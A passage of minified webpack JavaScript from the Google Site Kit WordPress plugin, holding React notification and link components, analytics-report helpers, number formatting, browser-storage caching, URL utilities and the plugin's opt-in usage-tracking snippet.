deExternalIndicator:n.hideExternalIndicator})]})]}));y.TYPES=g.Q,y.propTypes={className:s().string,title:s().oneOfType([s().string,s().object]),description:s().node,type:s().oneOf(Object.values(g.Q)),dismissButton:s().shape(DismissButton.propTypes),ctaButton:s().shape({...CTAButton.propTypes,label:s().string}),children:s().node,hideIcon:s().bool};const z=y},29785:(e,i,t)=>{t.d(i,{O4:()=>o,OQ:()=>s,qc:()=>n});const o="core/site",n="primary",s="secondary"},32600:(e,i,t)=>{t.d(i,{A:()=>NoticeNotification});var o=t(25797),n=t(68761),s=t(50539),a=t(8732),r=t(10740),I=t(62688),l=t.n(I),M=t(62540);function NoticeNotification({notificationID:e,children:i,dismissButton:t,ctaButton:I,gaTrackingEventArgs:l,...c}){const g=(0,n.A)(e),{dismissNotification:u}=(0,s.useDispatch)(a.D);return(0,M.jsx)(r.xA,{children:(0,M.jsx)(r.fI,{children:(0,M.jsx)(r.fh,{size:12,alignMiddle:!0,children:(0,M.jsx)(o.A,{dismissButton:{...t,onClick:async function(i){await(t?.onClick?.(i)),g.dismiss(l?.label,l?.value),u(e,{...t?.dismissOptions||{}})}},ctaButton:{...I,onClick:async function(i){g.confirm(l?.label,l?.value),await(I?.onClick?.(i)),I?.dismissOnClick&&u(e,{...I?.dismissOptions})}},...c,children:i})})})})}NoticeNotification.propTypes={notificationID:l().string.isRequired,children:l().node,dismissButton:l().oneOfType([l().bool,l().object]),ctaButton:l().object,gaTrackingEventArgs:l().object}},32803:(e,i,t)=>{t.d(i,{Y:()=>o});const o="search-console"},32981:(e,i,t)=>{t.d(i,{Ii:()=>M,sq:()=>l.s,ph:()=>n,Hb:()=>s,H5:()=>r,Aj:()=>I.A,JN:()=>c});var o=t(82871);function n(e,i={}){const{keyColumnIndex:t=0,maxSlices:n,withOthers:s=!1,tooltipCallback:a}=i,{rows:r=[]}=e||{},I="function"==typeof a,l=["Source","Percent"];I&&l.push({type:"string",role:"tooltip",p:{html:!0}});const M=[l],c=r.filter(({dimensionValues:e})=>"date_range_0"===e[1].value),g=c.reduce((e,i)=>e+parseInt(i.metricValues[0].value,10),0),u=r.filter(({dimensionValues:e})=>"date_range_1"===e[1].value),N=u.reduce((e,i)=>e+parseInt(i.metricValues[0].value,10),0);let j=s,d=c.length,D=g,y=N;n>0?(j=s&&c.length>n,d=Math.min(c.length,j?n-1:n)):(j=!1,d=c.length);for(let e=0;e<d;e++){const i=c[e],o=i.metricValues[t].value,n=u.find(({dimensionValues:e})=>e[0].value===i.dimensionValues[0].value);D-=o,y-=n?n.metricValues[t].value:0;const s=g>0?o/g:0,l=[i.dimensionValues[0].value,s];if(I){const e=r.find(({dimensionValues:e})=>"date_range_1"===e[1].value&&e[0].value===i.dimensionValues[0].value);l.push(a(i,e,l))}M.push(l)}if(j&&D>0){const e=[(0,o.__)("Others","google-site-kit"),D/g];I&&e.push(a({metricValues:[{value:D}]},{metricValues:[{value:y}]},e)),M.push(e)}return M}function s(e){if(void 0===e)return;const i=(e?.rows||[]).filter(({dimensionValues:e})=>"date_range_0"===e[1].value);return 1===i?.length||i?.[0]?.metricValues?.[0]?.value===e?.totals?.[0]?.metricValues?.[0]?.value}var a=t(17243);function r(e){if(void 0!==e)return!(e?.rows&&e?.totals&&!e?.totals?.every(a.isEmpty))||!e.totals.some(e=>!!e.metricValues&&e.metricValues.some(({value:e})=>e>0))}var I=t(65379),l=(t(25427),t(74508));function M(e){return e.replace(/&/gi,"&")}function c(e){return M(e).split("; ")}},33052:(e,i,t)=>{t.d(i,{A:()=>Typography});var o=t(62688),n=t.n(o),s=t(4452),a=t.n(s),r=t(8513),I=t(62540);function Typography({className:e,type:i,size:t,as:o="span",children:n,...s}){return(0,I.jsx)(o,{className:a()("googlesitekit-typography",e,{[`googlesitekit-typography--${i}`]:i&&r.tT.includes(i),[`googlesitekit-typography--${t}`]:t&&r.oJ.includes(t)}),...s,children:n})}Typography.propTypes={className:n().string,type:n().oneOf(r.tT),size:n().oneOf(r.oJ),as:n().oneOfType([n().string,n().elementType])}},33903:(e,i,t)=>{t.d(i,{A:()=>OverlayNotification});var o=t(62688),n=t.n(o),s=t(50539),a=t(8732),r=t(68761),I=t(5230),l=t(4452),M=t.n(l),c=t(97513),g=t(63696),u=t(33052),N=t(62540);function Title({children:e}){return(0,N.jsx)(u.A,{as:"h3",size:"medium",type:"title",className:"googlesitekit-overlay-card__title",children:e})}function Description({children:e}){return(0,N.jsx)("p",{className:"googlesitekit-overlay-card__description",children:e})}Title.propTypes={children:n().node.isRequired},Description.propTypes={children:n().node.isRequired};var j=t(82871),d=t(49383);function DismissButton({label:e=(0,j.__)("Maybe later","google-site-kit"),onClick:i,disabled:t}){return(0,N.jsx)(d.Button,{onClick:i,disabled:t,tertiary:!0,children:e})}const D={label:n().string,onClick:n().func,disabled:n().bool};function CTAButton(e){const{label:i,...t}=e;return(0,N.jsx)(d.Button,{...t,children:i})}DismissButton.propTypes=D,CTAButton.propTypes={...D,href:n().string,target:n().string,trailingIcon:n().object};var y=t(60515);function Body({title:e,description:i,ctaButton:t,dismissButton:o,GraphicDesktop:n,GraphicMobile:s,newBadge:a}){const r=(0,c.dv)();return(0,N.jsxs)(g.Fragment,{children:[r!==c.mp&&n&&(0,N.jsx)("div",{className:"googlesitekit-overlay-card__graphic",children:(0,N.jsx)(n,{})}),(0,N.jsxs)("div",{className:"googlesitekit-overlay-card__body",children:[a&&(0,N.jsx)("div",{className:"googlesitekit-overlay-card__badge",children:(0,N.jsx)(y.A,{hasNoSpacing:!0})}),e&&(0,N.jsx)(Title,{children:e}),i&&(0,N.jsx)(Description,{children:i})]}),(t||o)&&(0,N.jsxs)("div",{className:"googlesitekit-overlay-card__actions",children:[o&&(0,N.jsx)(DismissButton,{...o}),t&&(0,N.jsx)(CTAButton,{...t})]}),r===c.mp&&s&&(0,N.jsx)(s,{})]})}function OverlayCard(e){const{visible:i,className:t,...o}=e,n=(0,c.dv)();if(!i)return null;const s=(0,N.jsx)("div",{className:M()("googlesitekit-overlay-card",t),children:(0,N.jsx)(Body,{...o})});return n===c.mp?s:(0,N.jsx)(I.A,{direction:"up",in:i,children:s})}function OverlayNotification({notificationID:e,ctaButton:i,dismissButton:t,gaTrackingEventArgs:o,...n}){const I=(0,r.A)(e,o?.category,{confirmAction:o?.confirmAction,dismissAction:o?.dismissAction}),{dismissNotification:l}=(0,s.useDispatch)(a.D);const{dismissOnClick:M,dismissOptions:c,...g}=i||{};const u=i?{...g,onClick:async function(t){I.confirm(o?.label,o?.value),await(i?.onClick?.(t)),M&&l(e,{...c})}}:void 0;return(0,N.jsx)(OverlayCard,{ctaButton:u,dismissButton:{...t,onClick:async function(i){await(t?.onClick?.(i)),I.dismiss(o?.label,o?.value),l(e,{...t.dismissOptions})}},...n,visible:!0})}Body.propTypes={title:n().node,description:n().node,ctaButton:n().shape({...D,href:n().string,target:n().string,trailingIcon:n().element}),dismissButton:n().shape({...D}),GraphicDesktop:n().elementType,GraphicMobile:n().elementType,newBadge:n().bool},OverlayCard.propTypes={className:n().string,title:n().string,description:n().oneOfType([n().string,n().object]),ctaButton:n().shape({...D,href:n().string,target:n().string,trailingIcon:n().object}),dismissButton:n().shape(D),GraphicDesktop:n().elementType,GraphicMobile:n().elementType,newBadge:n().bool,visible:n().bool},OverlayCard.defaultProps={visible:!1},OverlayNotification.propTypes={notificationID:n().string,ctaButton:n().object,dismissButton:n().oneOfType([n().object,n().bool])}},37467:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o=t(63696),n=t(82286),s=t(51568);const __WEBPACK_DEFAULT_EXPORT__=function(e,i,a=t.g){const[r,I]=(0,o.useState)((0,n.d)(a.location.href,e)||i);return[r,function(i){I(i);const t=(0,s.F)(a.location.href,{[e]:i});a.history.replaceState(null,"",t)}]}},38017:(e,i,t)=>{t.d(i,{A:()=>I});var o=t(62688),n=t.n(o),s=t(4452),a=t.n(s),r=t(62540);function ChangeArrow({direction:e,invertColor:i,width:t,height:o}){return(0,r.jsx)("svg",{className:a()("googlesitekit-change-arrow",`googlesitekit-change-arrow--${e}`,{"googlesitekit-change-arrow--inverted-color":i}),width:t,height:o,viewBox:"0 0 10 10",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,r.jsx)("path",{d:"M5.625 10L5.625 2.375L9.125 5.875L10 5L5 -1.76555e-07L-2.7055e-07 5L0.875 5.875L4.375 2.375L4.375 10L5.625 10Z",fill:"currentColor"})})}ChangeArrow.propTypes={direction:n().string,invertColor:n().bool,width:n().number,height:n().number},ChangeArrow.defaultProps={direction:"up",invertColor:!1,width:9,height:9};const I=ChangeArrow},38432:(e,i,t)=>{t.d(i,{A:()=>k});var o,n=t(4452),s=t.n(n),a=t(62688),r=t.n(a),I=t(39941),l=t(63696),M=t(82871);function c(){return c=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},c.apply(null,arguments)}const g=e=>l.createElement("svg",c({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),o||(o=l.createElement("g",{fill:"none",fillRule:"evenodd"},l.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"currentColor"}),l.createElement("path",{fill:"#FFF",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var u;function N(){return N=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},N.apply(null,arguments)}const j=e=>l.createElement("svg",N({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),u||(u=l.createElement("g",{fill:"none",fillRule:"evenodd"},l.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"#FFF"}),l.createElement("path",{fill:"currentColor",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var d;function D(){return D=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},D.apply(null,arguments)}const y=e=>l.createElement("svg",D({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),d||(d=l.createElement("path",{d:"m12 20-8-8 8-8 1.425 1.4-5.6 5.6H20v2H7.825l5.6 5.6z"})));var z=t(83366),m=t(50304),T=t(62540);const p="BUTTON",S="BUTTON_DISABLED",A="EXTERNAL_LINK",x="LINK",E="ROUTER_LINK",h=(0,l.forwardRef)((e,i)=>{const{"aria-label":t,secondary:o=!1,arrow:n=!1,back:a=!1,caps:r=!1,children:l,className:c="",danger:u=!1,disabled:N=!1,external:d=!1,hideExternalIndicator:D=!1,href:h="",inverse:k=!1,noFlex:f=!1,onClick:w,small:C=!1,standalone:L=!1,linkButton:O=!1,to:b,leadingIcon:Z,trailingIcon:v,...R}=e;const U=h||b||!w?b?E:d?A:x:N?S:p;const P=U===p||U===S?"button":U===E?I.N_:"a",G=function(){let e;return U===A&&(e=(0,M._x)("(opens in a new tab)","screen reader text","google-site-kit")),U===S&&(e=(0,M._x)("(disabled)","screen reader text","google-site-kit")),e?t?`${t} ${e}`:"string"==typeof l?`${l} ${e}`:void 0:t}();let Q=Z,Y=v;return a&&(Q=(0,T.jsx)(y,{width:14,height:14})),d&&!D&&(Y=(0,T.jsx)(z.A,{width:14,height:14})),n&&!k&&(Y=(0,T.jsx)(g,{width:14,height:14})),n&&k&&(Y=(0,T.jsx)(j,{width:14,height:14})),(0,T.jsxs)(P,{"aria-label":G,className:s()("googlesitekit-cta-link",c,{"googlesitekit-cta-link--secondary":o,"googlesitekit-cta-link--inverse":k,"googlesitekit-cta-link--small":C,"googlesitekit-cta-link--caps":r,"googlesitekit-cta-link--danger":u,"googlesitekit-cta-link--disabled":N,"googlesitekit-cta-link--standalone":L,"googlesitekit-cta-link--link-button":O,"googlesitekit-cta-link--no-flex":!!f}),disabled:N,href:U!==x&&U!==A||N?void 0:h,onClick:w,rel:U===A?"noopener noreferrer":void 0,ref:i,target:U===A?"_blank":void 0,to:b,...R,children:[!!Q&&(0,T.jsx)(m.A,{marginRight:5,children:Q}),(0,T.jsx)("span",{className:"googlesitekit-cta-link__contents",children:l}),!!Y&&(0,T.jsx)(m.A,{marginLeft:5,children:Y})]})});h.propTypes={arrow:r().bool,back:r().bool,caps:r().bool,children:r().node,className:r().string,danger:r().bool,disabled:r().bool,external:r().bool,hideExternalIndicator:r().bool,href:r().string,inverse:r().bool,leadingIcon:r().node,linkButton:r().bool,noFlex:r().bool,onClick:r().func,small:r().bool,standalone:r().bool,to:r().string,trailingIcon:r().node};const k=h},39119:(e,i,t)=>{t.d(i,{Ed:()=>a,GQ:()=>r,K$:()=>c,R2:()=>s,RB:()=>M,Sy:()=>I,qd:()=>l,z9:()=>n});var o=t(82871);const n={post_types:(0,o.__)("Specific content types","google-site-kit"),per_post:(0,o.__)("Specified pages","google-site-kit"),sitewide:(0,o.__)("Site wide","google-site-kit")},s="rrm-product-id-open-access-notice",a="rrm-product-id-info-notice",r="rrm-setup-notification",I="setup-success-notification-rrm",l="rrm-product-id-contributions-notification",M="rrm-product-id-subscriptions-notification",c="reader-revenue-manager"},41671:(e,i,t)=>{t.d(i,{A:()=>I});var o=t(62688),n=t.n(o),s=t(82871),a=t(38432),r=t(97015);const LearnMoreLink=({className:e,external:i=!0,href:t,label:o=(0,s.__)("Learn more","google-site-kit"),onClick:n=()=>{}})=>t?r.createElement(a.A,{href:t,className:e,onClick:n,external:i},o):null;LearnMoreLink.propTypes={href:n().string.isRequired,className:n().string,label:n().string,external:n().bool,onClick:n().func};const I=LearnMoreLink},42343:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,n=t(63696);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},s.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>n.createElement("svg",s({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),o||(o=n.createElement("path",{fill:"currentColor",d:"m5.825 22 2.325-7.6L2 10h7.6L12 2l2.4 8H22l-6.15 4.4 2.325 7.6L12 17.3z"})))},48276:(e,i,t)=>{t.d(i,{VZ:()=>s,dc:()=>a,pH:()=>n,r0:()=>r});var o=t(84024);function n(e){try{return new URL(e).pathname}catch{}return null}function s(e,i){try{return new URL(i,e).href}catch{}return("string"==typeof e?e:"")+("string"==typeof i?i:"")}function a(e){return"string"!=typeof e?e:e.replace(/^https?:\/\/(www\.)?/i,"").replace(/\/$/,"")}function r(e,i){if(!(0,o.m)(e))return e;if(e.length<=i)return e;const t=new URL(e),n=e.replace(t.origin,"");if(n.length<i)return n;const s=n.length-Math.floor(i)+1;return"…"+n.substr(s)}},49383:e=>{e.exports=googlesitekit.components},49481:(e,i,t)=>{t.d(i,{f:()=>n,n:()=>o});const o="modules/search-console",n=0},49746:(e,i,t)=>{t.d(i,{Eo:()=>c,JK:()=>j,K5:()=>N,jq:()=>u,mK:()=>M});var o=t(17243),n=t(50532),s=t.n(n),a=t(82871);function r(e,i={}){const{formatUnit:t,formatDecimal:o}=function(e,i={}){const{hours:t,minutes:o,seconds:n}=I(e);return{hours:t,minutes:o,seconds:n,formatUnit(){const{unitDisplay:s="short",...r}=i,I={unitDisplay:s,...r,style:"unit"};return 0===e?u(n,{...I,unit:"second"}):(0,a.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,a._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),n?u(n,{...I,unit:"second"}):"",o?u(o,{...I,unit:"minute"}):"",t?u(t,{...I,unit:"hour"}):"").trim()},formatDecimal(){const i=(0,a.sprintf)( // translators: %s: number of seconds with "s" as the abbreviated unit. // translators: %s: number of seconds with "s" as the abbreviated unit. (0,a.__)("%ds","google-site-kit"),n);if(0===e)return i;const s=(0,a.sprintf)( // translators: %s: number of minutes with "m" as the abbreviated unit. // translators: %s: number of minutes with "m" as the abbreviated unit. (0,a.__)("%dm","google-site-kit"),o),r=(0,a.sprintf)( // translators: %s: number of hours with "h" as the abbreviated unit. // translators: %s: number of hours with "h" as the abbreviated unit. (0,a.__)("%dh","google-site-kit"),t);return(0,a.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,a._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),n?i:"",o?s:"",t?r:"").trim()}}}(e,i);try{return t()}catch{return o()}}function I(e){e=parseInt(e,10),Number.isNaN(e)&&(e=0);return{hours:Math.floor(e/60/60),minutes:Math.floor(e/60%60),seconds:Math.floor(e%60)}}function l(e){return 1e6<=e?Math.round(e/1e5)/10:1e4<=e?Math.round(e/1e3):1e3<=e?Math.round(e/100)/10:e}function M(e){let i={};return"%"===e?i={style:"percent",maximumFractionDigits:2}:"s"===e?i={style:"duration",unitDisplay:"narrow"}:e&&"string"==typeof e?i={style:"currency",currency:e}:(0,o.isPlainObject)(e)&&(i={...e}),i}function c(e,i={}){e=(0,o.isFinite)(e)?e:Number(e),(0,o.isFinite)(e)||(console.warn("Invalid number",e,typeof e),e=0);const t=M(i),{style:n="metric"}=t;return"metric"===n?function(e){const i={minimumFractionDigits:1,maximumFractionDigits:1};return 1e6<=e?(0,a.sprintf)( // translators: %s: an abbreviated number in millions. // translators: %s: an abbreviated number in millions. (0,a.__)("%sM","google-site-kit"),u(l(e),e%10==0?{}:i)):1e4<=e?(0,a.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,a.__)("%sK","google-site-kit"),u(l(e))):1e3<=e?(0,a.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,a.__)("%sK","google-site-kit"),u(l(e),e%10==0?{}:i)):u(e,{signDisplay:"never",maximumFractionDigits:1})}(e):"duration"===n?r(e,t):"durationISO"===n?function(e){let{hours:i,minutes:t,seconds:o}=I(e);return o=("0"+o).slice(-2),t=("0"+t).slice(-2),i=("0"+i).slice(-2),"00"===i?`${t}:${o}`:`${i}:${t}:${o}`}(e):u(e,t)}const g=s()(console.warn);function u(e,i={}){const{locale:t=j(),...o}=i;try{return new Intl.NumberFormat(t,o).format(e)}catch(i){g(`Site Kit numberFormat error: Intl.NumberFormat( ${JSON.stringify(t)}, ${JSON.stringify(o)} ).format( ${typeof e} )`,i.message)}const n={currencyDisplay:"narrow",currencySign:"accounting",style:"unit"},s=["signDisplay","compactDisplay"],a={};for(const[e,i]of Object.entries(o))n[e]&&i===n[e]||s.includes(e)||(a[e]=i);try{return new Intl.NumberFormat(t,a).format(e)}catch{return new Intl.NumberFormat(t).format(e)}}function N(e,i={}){const{locale:t=j(),style:o="long",type:n="conjunction"}=i;if(Intl.ListFormat){return new Intl.ListFormat(t,{style:o,type:n}).format(e)} /* translators: used between list items, there is a space after the comma. */const s=(0,a.__)(", ","google-site-kit");return e.join(s)}function j(e=t.g){const i=(0,o.get)(e,["_googlesitekitLegacyData","locale"]);if(i){const e=i.match(/^(\w{2})?(_)?(\w{2})/);if(e&&e[0])return e[0].replace(/_/g,"-")}return e.navigator.language}},49993:(e,i,t)=>{t.d(i,{Gq:()=>c,IL:()=>j,LD:()=>u,SO:()=>g,a2:()=>n,xD:()=>N});var o=t(6109);const n="googlesitekit_",s=`${n}1.170.0_${t.g._googlesitekitBaseData.storagePrefix}_`,a=["sessionStorage","localStorage"];let r,I=[...a];async function l(e){const i=t.g[e];if(!i)return!1;try{const e="__storage_test__";return i.setItem(e,e),i.removeItem(e),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.name)&&0!==i.length}}async function M(){if(void 0!==r)return r;for(const e of I)r||await l(e)&&(r=t.g[e]);return void 0===r&&(r=null),r}async function c(e){const i=await M();if(i){const t=i.getItem(`${s}${e}`);if(t){const e=JSON.parse(t),{timestamp:i,ttl:o,value:n,isError:s}=e;if(i&&(!o||Math.round(Date.now()/1e3)-i<o))return{cacheHit:!0,value:n,isError:s}}}return{cacheHit:!1,value:void 0}}async function g(e,i,{ttl:n=o.Jg,timestamp:a=Math.round(Date.now()/1e3),isError:r=!1}={}){const I=await M();if(I)try{return I.setItem(`${s}${e}`,JSON.stringify({timestamp:a,ttl:n,value:i,isError:r})),!0}catch(e){return t.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function u(e){const i=await M();if(i)try{const t=e.startsWith(n)?e:`${s}${e}`;return i.removeItem(t),!0}catch(e){return t.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function N(){const e=await M();if(e)try{const i=[];for(let t=0;t<e.length;t++){const o=e.key(t);0===o.indexOf(n)&&i.push(o)}return i}catch(e){return t.g.console.warn("Encountered an unexpected storage error:",e),[]}return[]}async function j(){if(await M()){const e=await N();for(const i of e)await u(i);return!0}return!1}},50304:(e,i,t)=>{t.d(i,{A:()=>IconWrapper});var o=t(62688),n=t.n(o),s=t(62540);function IconWrapper({children:e,marginLeft:i,marginRight:t}){return(0,s.jsx)("span",{className:"googlesitekit-icon-wrapper",style:{marginLeft:i,marginRight:t},children:e})}IconWrapper.propTypes={children:n().node.isRequired,marginLeft:n().number,marginRight:n().number}},50477:(e,i,t)=>{t.d(i,{C:()=>s,p:()=>n});var o=t(55465);function n(e,i={}){return{__html:o.O.sanitize(e,i)}}function s(e){const i="object"==typeof e?e.toString():e;return i?.replace?.(/\/+$/,"")}},50539:e=>{e.exports=googlesitekit.data},52274:(e,i,t)=>{t.d(i,{i:()=>a});var o=t(63696),n=t(50539),s=t(7972);function a(e){const{setValue:i}=(0,n.useDispatch)(s.n);return(0,o.useCallback)(()=>{i("admin-screen-tooltip",{isTooltipVisible:!0,...e})},[i,e])}},55465:(e,i,t)=>{t.d(i,{O:()=>n});var o=t(31234);const n=t.n(o)()(t.g)},58718:(e,i,t)=>{t.d(i,{CX:()=>n,Py:()=>a,SM:()=>o,kj:()=>s});const o="adsense-connect-cta",n="adsense-connect-cta-tooltip-state",s="adsense-ga4-top-earnings-notice",a="adsense"},60515:(e,i,t)=>{t.d(i,{A:()=>u});var o=t(62688),n=t.n(o),s=t(4452),a=t.n(s),r=t(63696),I=t(82871),l=t(49383),M=t(5855),c=t(38432),g=t(62540);function NewBadge({tooltipTitle:e,learnMoreLink:i,forceOpen:t,hasLeftSpacing:o,hasNoSpacing:n,onLearnMoreClick:s=()=>{}}){const u=(0,g.jsx)(M.A,{className:a()("googlesitekit-new-badge",{"googlesitekit-new-badge--has-no-spacing":n}),label:(0,I.__)("New","google-site-kit"),hasLeftSpacing:o});return e?(0,g.jsx)(l.Tooltip,{tooltipClassName:"googlesitekit-new-badge__tooltip",title:(0,g.jsxs)(r.Fragment,{children:[e,(0,g.jsx)("br",{}),(0,g.jsx)(c.A,{href:i,onClick:s,external:!0,hideExternalIndicator:!0,children:(0,I.__)("Learn more","google-site-kit")})]}),placement:"top",enterTouchDelay:0,leaveTouchDelay:5e3,open:t,interactive:!0,children:u}):u}NewBadge.propTypes={tooltipTitle:n().string,learnMoreLink:n().string,forceOpen:n().bool,onLearnMoreClick:n().func,hasLeftSpacing:n().bool,hasNoSpacing:n().bool};const u=NewBadge},61983:(e,i,t)=>{t.d(i,{A:()=>DismissButton});var o=t(62688),n=t.n(o),s=t(82871),a=t(49383),r=t(62540);function DismissButton({className:e,label:i=(0,s.__)("Maybe later","google-site-kit"),onClick:t,disabled:o,tertiary:n=!0}){return t?(0,r.jsx)(a.Button,{className:e,onClick:t,disabled:o,tertiary:n,children:i}):null}DismissButton.propTypes={className:n().string,label:n().string,onClick:n().func,disabled:n().bool,tertiary:n().bool,dismissOptions:n().shape({expiresInSeconds:n().number,skipHidingFromQueue:n().bool})}},62659:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o=t(63696),n=t(19826);const __WEBPACK_DEFAULT_EXPORT__=function(){return(0,o.useContext)(n.Ay)}},65054:(e,i,t)=>{t.d(i,{M9:()=>A,sx:()=>p,BI:()=>S});var o=t(17243);const n="_googlesitekitDataLayer",s="data-googlesitekit-gtag";function a(e){return function(){e[n]=e[n]||[],e[n].push(arguments)}}var r=t(84895);const I={activeModules:[],isAuthenticated:!1,referenceSiteURL:"",trackingEnabled:!1,trackingID:"",userIDHash:"",userRoles:[]};const{activeModules:l=[],isSiteKitScreen:M,trackingEnabled:c,trackingID:g,referenceSiteURL:u,userIDHash:N,isAuthenticated:j,userRoles:d}=t.g._googlesitekitTrackingData||{},D={activeModules:l,trackingEnabled:c,trackingID:g,referenceSiteURL:u,userIDHash:N,isSiteKitScreen:M,userRoles:d,isAuthenticated:j,pluginVersion:"1.170.0"},{enableTracking:y,disableTracking:z,isTrackingEnabled:m,initializeSnippet:T,trackEvent:p,trackEventOnce:S}=function(e,i=t.g,l=t.g){const M={...I,...e};M.referenceSiteURL&&(M.referenceSiteURL=M.referenceSiteURL.toString().replace(/\/+$/,""));const c=function(e,i){const o=a(i);let I;const{activeModules:l,referenceSiteURL:M,userIDHash:c,userRoles:g=[],isAuthenticated:u,pluginVersion:N}=e;return function(){const{document:i}=t.g;if(void 0===I&&(I=!!i.querySelector(`script[${s}]`)),I)return!1;I=!0;const a=g?.length?g.join(","):"";o("js",new Date),o("config",e.trackingID,{groups:"site_kit",send_page_view:e.isSiteKitScreen,domain:M,plugin_version:N||"",enabled_features:Array.from(r.t).join(","),active_modules:l.join(","),authenticated:u?"1":"0",user_properties:{user_roles:a,user_identifier:c}});const j=i.createElement("script");return j.setAttribute(s,""),j.async=!0,j.src=`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${n}`,i.head.appendChild(j),{scriptTagSrc:`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${n}`}}}(M,i),g=function(e,i,t,o){const n=a(i);return async function(i,s,a,r){const{trackingEnabled:I}=e;if(!I)return null;t();const l={send_to:"site_kit",event_category:i,event_label:a,value:r};return new Promise(e=>{const t=setTimeout(function(){o.console.warn(`Tracking event "${s}" (category "${i}") took too long to fire.`),e()},1e3);function a(){clearTimeout(t),e()}n("event",s,{...l,event_callback:a}),o._gaUserPrefs?.ioo?.()&&a()})}}(M,i,c,l),u={};return{enableTracking:function(){M.trackingEnabled=!0},disableTracking:function(){M.trackingEnabled=!1},initializeSnippet:c,isTrackingEnabled:function(){return!!M.trackingEnabled},trackEvent:g,trackEventOnce:function(...e){const i=JSON.stringify(e);u[i]||(u[i]=(0,o.once)(g)),u[i](...e)}}}(D);function A(e){e?y():z()}M&&c&&T()},65379:(e,i,t)=>{t.d(i,{A:()=>a});var o=t(50532),n=t.n(o),s=t(17243);const a=n()(({metrics:e,dimensions:i,...t}={})=>({metrics:r(e),dimensions:I(i),...t}));function r(e){return(0,s.castArray)(e).map(e=>"string"==typeof e?{name:e}:e).filter(e=>(0,s.isPlainObject)(e))}function I(e){return(0,s.castArray)(e).map(e=>"string"==typeof e?{name:e}:e).filter(e=>(0,s.isPlainObject)(e))}},65929:(e,i,t)=>{t.d(i,{A:()=>g});var o=t(63696),n=t(50539),s=t(29785),a=t(97345),r=t(88273),I=t(70301),l=t(49993),M=t(65054),c=t(62659);function g(e){const i=(0,c.A)(),t=(0,n.useSelect)(i=>i(r.i).getModule(e)),g=(0,n.useSelect)(e=>e(a.oR).hasCapability(a.HD)),{activateModule:u}=(0,n.useDispatch)(r.i),{navigateTo:N}=(0,n.useDispatch)(I.M),{setInternalServerError:j}=(0,n.useDispatch)(s.O4),d=(0,o.useCallback)(async()=>{const{error:t,response:o}=await u(e);t?j({id:`${e}-setup-error`,description:t.message}):(await(0,M.sx)(`${i}_widget-activation-cta`,"activate_module",e),await(0,l.SO)("module_setup",e,{ttl:300}),N(o.moduleReauthURL))},[u,e,N,j,i]);return t?.name&&g?d:null}},67280:(e,i,t)=>{var o=t(50539),n=t.n(o),s=t(8732),a=t(32091),r=t.n(a);function I(e){const i=t.g[e];if(!i)return!1;try{const e="__storage_test__";return i.setItem(e,e),i.removeItem(e),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.name)&&0!==i.length}}class NullStorage{get length(){return 0}key(){return null}getItem(){return null}setItem(){}removeItem(){}clear(){}}let l;var M=t(97345),c=t(8084),g=t(19484),u=t(84895);function N(e,{groupID:i,viewContext:t,isDismissed:o,_enabledFeatureFlags:n}={}){return!(e?.featureFlag&&!(0,u.G)(e.featureFlag,n?new Set(n):void 0))&&(e.groupID===i&&(!(e.viewContexts?.length&&t&&!e.viewContexts.includes(t))&&(!e.isDismissible||!o)))}var j=t(84730);const 